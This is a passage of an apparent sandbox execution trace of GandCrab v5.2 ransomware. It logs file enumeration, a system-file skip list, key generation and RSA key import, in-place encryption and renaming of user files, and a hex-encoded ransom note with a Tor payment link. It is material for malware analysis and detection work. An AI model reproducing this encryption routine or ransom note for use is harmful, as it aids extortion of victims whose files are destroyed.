lpString2="autorun.inf") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.626] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.626] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.626] lstrcmpW (lpString1="Welcome to Excel.xltx", lpString2=".") returned 1 [0079.626] lstrcmpW (lpString1="Welcome to Excel.xltx", lpString2="..") returned 1 [0079.626] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Welcome to Excel.xltx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" [0079.627] lstrlenW (lpString=".titwmvjl") returned 9 [0079.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0079.627] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.627] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.titwmvjl") returned 88 [0079.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0079.627] lstrlenW (lpString=".xltx") returned 5 [0079.627] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.627] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltx ") returned 6 [0079.627] lstrcmpiW (lpString1=".xltx", lpString2=".titwmvjl") returned 1 [0079.627] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0079.627] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0079.627] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="desktop.ini") returned 1 [0079.627] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="autorun.inf") returned 1 [0079.627] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ntuser.dat") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="iconcache.db") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="bootsect.bak") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="boot.ini") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ntuser.dat.log") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="thumbs.db") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="KRAB-DECRYPT.html") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="CRAB-DECRYPT.html") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="ntldr") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="NTDETECT.COM") returned 1 [0079.628] lstrcmpiW (lpString1="Welcome to Excel.xltx", lpString2="Bootfont.bin") returned 1 [0079.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx") returned 79 [0079.628] lstrlenW (lpString=".xltx") returned 5 [0079.628] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.628] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltx ") returned 6 [0079.628] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.628] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.628] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0079.629] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.629] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.644] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.644] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.644] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.648] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.649] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.649] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.649] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0079.649] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.649] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.649] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.649] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.649] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.653] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.653] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.654] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.654] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0079.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.654] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.654] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.654] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.657] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.658] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503738) returned 1 [0079.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.658] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.658] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.659] GetLastError () returned 0x0 [0079.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.659] CryptDestroyKey (hKey=0x503738) returned 1 [0079.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.659] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.659] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.663] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503938) returned 1 [0079.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.663] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.663] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.663] GetLastError () returned 0x0 [0079.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.664] CryptDestroyKey (hKey=0x503938) returned 1 [0079.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.664] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.664] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.664] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.664] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x78c9b, lpOverlapped=0x0) returned 1 [0079.707] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfff87365, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.707] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x78c9b, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x78c9b, lpOverlapped=0x0) returned 1 [0079.712] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0079.713] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.718] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.721] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.721] CloseHandle (hObject=0x2c4) returned 1 [0079.730] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Welcome to Excel.xltx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\welcome to excel.xltx.titwmvjl"), dwFlags=0x1) returned 1 [0079.730] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.730] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0079.731] FindClose (in: hFindFile=0x503478 | out: hFindFile=0x503478) returned 1 [0079.731] CloseHandle (hObject=0x2bc) returned 1 [0079.732] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.732] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.732] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.732] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt" [0079.732] lstrlenW (lpString=".titwmvjl") returned 9 [0079.732] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 68 [0079.732] VirtualAlloc (lpAddress=0x0, dwSize=0xc8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.732] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 77 [0079.732] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 68 [0079.732] lstrlenW (lpString=".txt") returned 4 [0079.732] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.732] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.732] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.732] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.732] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 68 [0079.733] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\TITWMVJL-DECRYPT.txt") returned 68 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.733] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.733] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.733] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0079.733] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0079.733] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0079.733] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="UProof" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof" [0079.733] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\" [0079.733] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.734] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.734] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.734] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.734] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.734] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.734] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.735] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\\\TITWMVJL-DECRYPT.txt") returned 76 [0079.735] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\UProof\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\uproof\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0079.735] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2